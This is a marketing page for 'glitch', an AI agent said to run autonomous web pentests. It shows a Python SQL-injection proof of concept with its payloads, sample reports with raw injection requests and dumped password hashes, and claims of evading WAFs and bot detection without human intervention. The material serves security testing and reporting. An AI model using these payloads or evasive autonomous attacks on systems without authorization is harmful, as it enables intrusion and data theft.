glitch@pentester:~$ ./scan --mode=autonomous --target
LIVE·1,247 vulnerabilities found this week
/\_/\
( ω)╌╌
> ◇<
/| |\
(_| |_)
~glitch~


An autonomous AI agent that runs a full pentest — recon, exploitation, reporting — while you sleep.

Watch demoor sign up free →
glitch.
Live
Activity
Click any finding to expand details

Works with the tools you trust

httpxkatanaffufsqlmapNucleiBurp SuiteOWASP ZAPnmapMetasploitNiktosubfinderdirsearchhttpxkatanaffufsqlmapNucleiBurp SuiteOWASP ZAPnmapMetasploitNiktosubfinderdirsearch
SQL InjectionXSSSSRFIDORJWT AttacksRace ConditionsBusiness LogicGraphQLAPI SecurityAuth Bypass
Live demo

Watch it hack a web app.

An AI agent that thinks, clicks, and exploits — just like a senior pentester.See every action in real time.

0vulns found this week
0scans completed
0to first finding
glitch.
Live
Activity
Click any finding to expand details

What makes it different

0bot detections

Real Chrome browser

Controls a real Chrome session through a custom extension. Invisible to Cloudflare, DataDome, Akamai, and reCAPTCHA.

CloudflareDataDomeAkamaireCAPTCHA
5escalation levels

AI reasoning engine

The agent thinks before it acts — analyzing responses, planning multi-step attacks, and adapting when WAFs block payloads.

Context-awareAdaptiveMulti-step
<1%false positive rate

Verified findings only

Every vulnerability is exploited and verified before reporting. No theoretical risks. No noise. Just real, proven bugs.

Verified PoCEvidenceCVSS scored
4:32average scan time

Minutes, not days

Full recon → exploitation → report in under 5 minutes. Parallel workers test 10+ endpoints simultaneously.

ParallelAutonomousCI/CD ready

That was 4 minutes. Imagine what it finds in your app.

Scan your app free →

Built different.

Not another wrapper around Nuclei. An autonomous agent that reasons, adapts, and finds bugs that automated scanners miss — with a cute face and sharp claws.

Zero Detection

Real Chrome browser.
Invisible to every WAF.

Controls a real Chrome session through a custom extension — not Puppeteer, not Selenium. Invisible to Cloudflare, DataDome, Akamai, and reCAPTCHA.

https://target.app
Extension ready
Cloudflare
DataDome
Akamai
reCAPTCHA
5 Escalation Levels

Thinks before it hacks.

Analyzes responses, plans multi-step attacks, and adapts when WAFs block payloads.

L1StandardKnown payloads
L2WAF BypassEncoding tricks
L3CreativeCustom payloads
L4DeepEdge cases
L5ChainingMulti-step
Waiting for scan...
Multi-Agent System

4 agents. One mission.

Not one monolithic scanner — a team of specialized AI agents that coordinate, delegate, and verify each other's work.

Main Agent
Drives the scan — recon, testing, exploitation
MiniMax 2.5
Triage Agent
Ranks fuzz anomalies, filters noise
MiniMax 2.5
Specialist Agent
Writes PoC exploits, verifies vulns
Opus 4.6
Extraction Agent
Builds knowledge graph from traffic
MiniMax 2.5
🔑 Bring Your Own Key

Use your own API keys — Claude, GPT, Gemini, or any OpenAI-compatible endpoint. You control the model, the cost, and the data.

Specialist Agents

It writes the exploit. Runs it. Shows you the proof.

Frontier models write real Python PoCs, execute them live, and show you the output. You see the code, you see the result. Bye bye false positives.

Specialist: Claude Opus 4standby
exploit_sqli.py
Python
1import httpx, time
2
3url = f"{TARGET}/api/users"
4payloads = [
5 "1' OR 1=1--",
6 "1' UNION SELECT null,null--",
7 "1; WAITFOR DELAY '0:0:5'--",
8]
9for p in payloads:
10 r = httpx.get(url, params={"id": p})
11 elapsed = r.elapsed.total_seconds()
12 if elapsed > 4.8:
13 print(f"⚡ TIME-BASED SQLi: {elapsed:.1f}s")
OUTPUT
$ python exploit_sqli.py
Testing 3 payloads against /api/users...
Payload 1: OR 1=1 → 200 OK (0.12s)
Payload 2: UNION SELECT → 500 Error (0.09s)
⚡ TIME-BASED SQLi CONFIRMED: 5.03s delay
✓ Blind SQL Injection — EXPLOITED
✓ Real code. Real execution. Zero false positives.
Auto-research

CVE Intelligence

Detects tech versions, auto-researches CVEs, tests exploits in background.

Background workers, zero latency
CRITICAL
9.8
CVE-2022-22965Spring Boot 2.6.1
Spring4Shell — RCE via ClassLoader
exploiting
CRITICAL
9.8
CVE-2022-22963Spring Cloud
SpEL injection via routing
confirmed
HIGH
7.5
CVE-2021-42340Tomcat 9.0.54
DoS via incomplete upload
tested
Severity escalation

Attack Chain Engine

Chains low-severity findings into critical exploits. Two Lows become one Critical.

Low + Low = Critical
LOW
Open Redirect
/oauth/callback
LOW
Token in URL
/api/auth
MEDIUM
No token rotation
/api/sessions
CRITICAL9.1
Account Takeover
Step 1Open Redirect
Step 2Token in URL
Step 3No token rotation
✓ CHAIN VERIFIED
SmartEndpoints

Persistent Memory

SmartEndpoints track every URL, parameter, and response variation across 2,000+ iterations.

Survives context window trimming
GET/api/users/{id}2
POST/api/auth/login
PUT/api/users/{id}1
DELETE/api/sessions
47 SmartEndpoints
GET/api/users/{id}🔒 bearer23 reqs
Parameters
idintpath*
fieldsstringquery
includestringquery
Response Variations
200User object×14
403Forbidden×3
404Not found×1
Security Notes
Sequential IDs — predictable
PII in response (email, phone)
No rate limiting on enumeration
Vuln Indicators
IDORidhigh
Enumidmedium
Response Schema
{ id, email, phone, role, created_at }
Tests
IDOR SQLi XSS
BOLA on role field, Enum user IDs
discovered iter 12enriched ×6last iter 8404 URL vars✓ survives trimming
OOB Callbacks

Blind Vuln Detection

OOB callback server catches blind SSRF, XSS, SQLi. Payloads phone home — even when responses look clean.

Detects what scanners miss
① INJECT
POST /api/users
{"email":"{{OOB}}"}
② TARGET
200 OK— looks clean
⚠ outbound DNS resolve
③ OOB SERVER
DNS Callback
HTTP Callback
⚡ BLIND SSRF CONFIRMED
2 callbacks · 340ms

Supported vulnerability types

SQL InjectionXSSSSRFIDORJWT AttacksRace ConditionsBusiness LogicGraphQLAPI SecurityAuth BypassCORSXXEOpen RedirectFile UploadCommand InjectionPath Traversal

How it works

Five autonomous phases. Zero human intervention.

Phase 01Reconnaissance

Sees everything. Before it tests anything.

127endpoints mapped

The agent crawls every route in your SPA, reads your JavaScript bundles to find API paths the browser never visits, and fingerprints your entire stack down to the patch version. It logs in, maps every role, and builds a complete picture of your attack surface — endpoints,...

Reads JavaScript sourcefinds hidden API routes, hardcoded secrets, and internal endpoints buried in production bundles
Fingerprints everythingframework, version, middleware, database, cloud provider, down to the patch level
Discovers what's exposedREST APIs, GraphQL schemas, health checks, admin panels, forgotten debug endpoints
Maps authenticationlogin flows, JWT structure, OAuth providers, session handling, role hierarchies
glitch.Live
Agent Activity
https://app.cloudmatrix.io
Discovered Endpoints0 found...

Client-ready reports

Reports your clients will actually read

No email gate. No "request a demo." This is what every scan produces.

glitch. Security Assessment

Target: acme-webapp.com|February 2026|47 endpoints tested
2Critical
3High
4Medium
1Low

Executive Summary

Automated assessment identified 10 vulnerabilities across 47 endpoints. 2 critical findings require immediate remediation — a SQL injection in the user API enables full database extraction, and a payment bypass allows orders without payment.

Findings

SeverityFindingCVSSStatus
CRITICALSQL Injection — /api/v2/users9.8Exploited

The `id` parameter in the user lookup endpoint is directly concatenated into a SQL query without parameterization. An attacker can extract the entire database contents including password hashes, PII, and API keys.

Evidence
$ curl 'https://acme-webapp.com/api/v2/users?id=1%27%20OR%20%271%27=%271'
HTTP/1.1 200 OK
Content-Type: application/json
{"users":[{"id":1,"email":"admin@acme.app","role":"admin"},
{"id":2,"email":"jane@acme.app","role":"user"},
... 3,410 more rows ]
Remediation

Use parameterized queries or an ORM. Replace raw SQL string concatenation in UserController.getById() with prepared statements.

CWE-89: SQL Injection
CRITICALPayment Bypass — checkout flow9.1Confirmed
HIGHJWT Algorithm Confusion8.1Exploited
HIGHRace Condition — coupon abuse7.5Confirmed
MEDIUMMissing CSP Header5.3Detected

Every scan generates a client-ready report. Export as JSON, SARIF, or view in the dashboard.

Run your first scan →

Zero Findings = Zero Cost

If we don't find anything, you don't pay. Guaranteed.

Arsenal

Your entire security toolkit.
One agent.

glitch orchestrates 20+ industry-standard tools alongside its own AI-powered analysis. Every tool runs in terminal, every result feeds back into the agent's reasoning.

Nuclei

Template-based vulnerability scanner with 8000+ community templates

ffuf

Lightning-fast web fuzzer for directory and parameter discovery

nmap

Network discovery and security auditing

OWASP ZAP

Web app security scanner with active/passive modes

sqlmap

Automatic SQL injection detection and exploitation

Nikto

Web server vulnerability scanner

httpx

Fast HTTP toolkit for probing and fingerprinting

subfinder

Subdomain discovery and enumeration

katana

Next-gen web crawling and spidering framework

dirsearch

Web path discovery brute-forcer

Burp Suite

Intercepting proxy for manual testing

Metasploit

Penetration testing framework

Plus your own

Any tool that runs in a terminal, glitch can use. Write a shell command, the agent executes it.

terminal
$ glitch scan https://target.com --tools nuclei,ffuf,sqlmap$ glitch create tool my_tool

Built on open source

OWASPOWASP Foundation
ProjectDiscoveryNuclei · httpx · subfinder
PortSwiggerBurp Suite
Rapid7Metasploit Framework

Real results

What glitch. actually finds 🎯

Real findings from real scans. Click any finding to see the full report — proof-of-concept, evidence, and remediation steps included.

+ 7 more findings in full report
#1CriticalSQL Injection🔗 Full Account TakeoverCVSS 9.8

Blind SQL Injection via User ID Parameter

Location

GET /api/v2/users?id=

Description

The id parameter in the user lookup endpoint is vulnerable to time-based blind SQL injection. The application directly interpolates user input into a SQL query without parameterization, allowing an attacker to extract the entire database contents including password hashes and PII.

Evidence

GET /api/v2/users?id=1' OR '1'='1'-- HTTP/1.1
Host: acme-corp.com

HTTP/1.1 200 OK
Content-Length: 847291

→ 3,412 rows returned (expected: 1)
→ Entire users table exfiltrated incl. bcrypt hashes

Raw HTTP

REQUEST
GET /api/v2/users?id=1' OR '1'='1'-- HTTP/1.1
Host: acme-corp.com
Cookie: session=eyJhbGciOi...
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64)
RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 847291

[{"id":1,"email":"admin@acme.app","password_hash":"$2b$10$kR8..."},
 {"id":2,"email":"jane@acme.app","password_hash":"$2b$10$mQ4..."},
 ... 3,410 more rows]

Steps to Reproduce

  1. 1Send GET /api/v2/users?id=1 — observe normal 1-row response
  2. 2Send GET /api/v2/users?id=1' OR '1'='1'-- — observe full table dump
  3. 3Confirm time-based: id=1'; WAITFOR DELAY '0:0:5'-- → 5.03s response
  4. 4Extract admin credentials: admin@acme.app / $2b$10$...

Impact

Full database read access. Attacker can exfiltrate all user records including password hashes, PII, and session tokens.

Recommendation

Use parameterized queries or prepared statements. Never concatenate user input into SQL strings.

References

CWE-89OWASP A03:2021CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

How we compare

glitch. vs. the rest

Featureglitch.
AikidoBurp SuiteOWASP ZAP
Autonomous scanning
Business logic testing
Attack chain detection
AI reasoning engine
CLI + self-hosted option
20+ tool orchestration
Autonomous browser control
Undetectable by bot detectors
SARIF / CI/CD output
Whitebox + blackbox testing
Zero config setup
Free tier available

Feature comparison based on default product capabilities. Some tools may support features via plugins.

A single manual pentest costs $10,000–$50,000.

Unlimited scans. A fraction of the cost.

MonthlyAnnual

Free

For individual developers.

$0/mo
  • 3 scans / month
  • 1 concurrent scan
  • JSON export
  • Community support
Get started
Most Popular

Pro

For security engineers.

$99/mo
  • 50 scans / month
  • 3 concurrent scans
  • SARIF + JSON export
  • Attack chain detection
  • Email alerts
  • Priority support
Start free trial

Team

For security teams.

$299/mo
  • 200 scans / month
  • 10 concurrent scans
  • CI/CD integration
  • Slack notifications
  • Scan diffing
  • Team management
Start free trial

Enterprise

For organizations.

Custom
  • Unlimited scans
  • Self-hosted option
  • SSO / SAML
  • SLA guarantee
  • Dedicated CSM
  • Custom integrations
Contact sales

14-day free trial. No credit card required.

Frequently asked questions

$glitch scanhttps://target.com

Start scanning.

No credit card. No config. Just paste your URL and get results in minutes.

Start your free scan →Watch demo
No credit card required
3 free scans on signup
Results in under 5 minutes